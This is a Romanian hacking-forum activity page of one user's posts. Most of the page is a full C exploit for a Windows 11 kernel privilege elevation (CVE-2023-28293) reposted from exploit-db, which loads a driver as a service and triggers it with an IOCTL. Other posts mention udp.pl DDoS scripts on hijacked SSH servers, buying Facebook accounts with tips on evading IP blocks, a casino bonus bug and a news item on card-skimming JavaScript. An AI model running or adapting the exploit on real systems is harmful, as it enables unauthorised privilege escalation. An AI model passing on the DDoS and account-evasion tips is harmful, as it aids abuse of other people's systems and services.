Jump to content

GabrielRo

Active Members
 View Profile  See their activity

  • Posts

    82

  • Joined

  • Last visited

  • Days Won

    3

 Content Type 

Posts posted by GabrielRo

  4. SNSC si contractori individuali / Bug Bounty pe infrastructura Romania?

    in Bug Bounty

    Posted

    1 hour ago, pp2023 said:

    acum ceva timp gasisesem din greseala o smecherie de superbet de iti baga banii bonus ca si fonduri cash si nu mai necesitau rulajul, nu stiam ca au bug bounty tho. cui ii pot da si eu un pm sa i ii explic treaba asta si sa-mi spuna daca se merita sa le dau un mesaj? e destul de rudimentara treaba si totusi nu stiu daca mai de actualitate, dar se poate testa 

     

    https://superbet.ro/security.txt

  6. trickuri de furat conturi

    in Cosul de gunoi

    Posted · Edited by GabrielRo

    1 hour ago, ANDREI1984 said:

    buna baieti,,,, si fete, in continuare am sa va invat cateva ponturi de furat conturi de tot  felul.

     

    un pont pe zi

    1 incerci sa faci cont, si vezi ce nume nu iti da voie, ptr k sunt deja folosite

    Maturizeaza-te kid! 

    • Haha 1

  7. Windows 11 22h2 - Kernel Privilege Elevation

    in Exploituri

    Posted · Edited by GabrielRo 

    // Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293

#include <windows.h>
#include <stdio.h>

// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";

// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";

// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003

// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

int main()
{
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE];

    // Load the vulnerable driver
    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
    {
        printf("Error loading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Error opening vulnerable driver device: %d\n", GetLastError());
        return 1;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
    {
        printf("Error sending IOCTL: %d\n", GetLastError());
        return 1;
    }

    // Print the output buffer contents
    printf("Output buffer:\n%s\n", output_buffer);

    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver"))
    {
        printf("Error unloading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Close the vulnerable driver device
    CloseHandle(device);

    return 0;
}

BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL)
    {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS)
        {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL)
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
        else
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Start the service
    if (!StartService(service, 0, NULL))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

BOOL UnloadDriver(LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL)
    {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Delete the service
    if (!DeleteService(service))
    {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

     

    Source: https://www.exploit-db.com/exploits/51544

  8. Salut!

    in Bine ai venit

    Posted · Edited by GabrielRo

    On 6/29/2023 at 10:45 AM, Trook1956 said:

    Încă funcționează, bro!!

    tiny fishing

     

    Si ce dracu` faci cu un ssh? ma intreb si eu.. urci arhiva udp.pl pe el   si dai ddos

    pe un ssh prins in scanner`ul tau. :(

     

  12. Cumpar conturi facebook

    in RST Market

    Posted

    16 hours ago, FC1 said:

    Salut, sau fac eu ceva gresit, dar cum am facut contul, am luat block, exceptand ca am folosit browserul pe incognite, nu stiu care altu sa fie motivul.
    Am mai avut un cont de vreo 9 ani, am inceput sa il refolosesc de curand si am dat share in vreo 10 grupuri la un eveniment, am luat block ....

     

    Salut! Dacă încerci sa-ti faci conturi cu același IP, facebook îți recunoaște ip-ul, și te blochează automat după crearea contului, încearcă sa-ti faci cont cu un vpn, sau revi cu crearea contului mai târziu. 

  13. Salut!

    in Bine ai venit

    Posted

    On 5/5/2023 at 6:23 PM, xstreamz said:

    Imi poate da si mie cineva un wget udp.pl si scan? multumesc!

     

    Bro suntem în anul 2023, tu crezi ca mai funcționează UDP.pl si scan! 

  14. Cumpar conturi facebook

    in RST Market

    Posted

    On 6/7/2023 at 8:55 PM, FC1 said:

    Salutari, nu stiu daca mai ii viu chatul asta, am si eu nevoie de 1-2 conturi de FB si pagini de FB, ma intereseaza ca sa pot da like uri, share uri si invite uri pentru un bar. Mersi

    De ce nu-ti faci tu niște conturi? 

  25. Group-IB şi hoţii de buzunare

    in Stiri securitate

    Posted · Edited by GabrielRo

    Zilele trecute, GROUP-IB (firmă rusească de threath intelligence, renumită la nivel mondial, cunoscută prin legăturile pe care le are cu structurile de law-enforcement de genul INTERPOL) se lăuda pe site-ul lor despre cum au contribuit la capturarea unor lideri Indonezieni ai unei grupări de hoţi de buzunare contemporani sau, pe limbaj tehnic, JavaScript-sniffers, denumită „GetBilling„.

    Hoţii noştri se pare că ţinteau (şi încă ţintesc, pentru că nu i-au prins pe toţi) site-uri de comerţ on-line din Asia, Europa, Australia şi Americi (deci erau, într-un fel, specialiști ai buzunăritului cibernetic, ce să mai…), pe care le infectau cu un cod JavaScript maliţios care fura datele personale ale clienţilor, precum numărul cărţii de credit, nume, adrese, credenţiale, numere de telefon şi alte date de autentificare pentru diverse sisteme de plăţi virtuale. Cert este că gruparea era urmărită din 2018 şi a fost prinsă în 2020, timp în care ar fi infectat aproape 200 de site-uri (deşi Group-IB spune că numărul este probabil mai ridicat…) şi, în plus, membrii acestuia nu sunt noi în lumea criminalităţii cibernetice.

    În anul 2019, firma a descoperit încă 19 grupări care utilizează acelaşi mod de operare şi numărul nu poate fi decât în creştere.

    Ce este de reţinut din a aceste rânduri, ar fi să nu ne expunem cardurile personale pe platforme de plăţi online aşa de lejer şi cel mai sigur ar fi să utilizăm soluţii fin-tech (aka carduri virtuale) de tipul Revolut, Monese, TransferWise, Crypto, BunQ, etc…

    By the way, operaţiunea din Indonezia se numea NIGHT FURY.

     

    Source: https://securitypatch.ro/group-ib-si-hotii-de-buzunare/

×
×
  • Create New...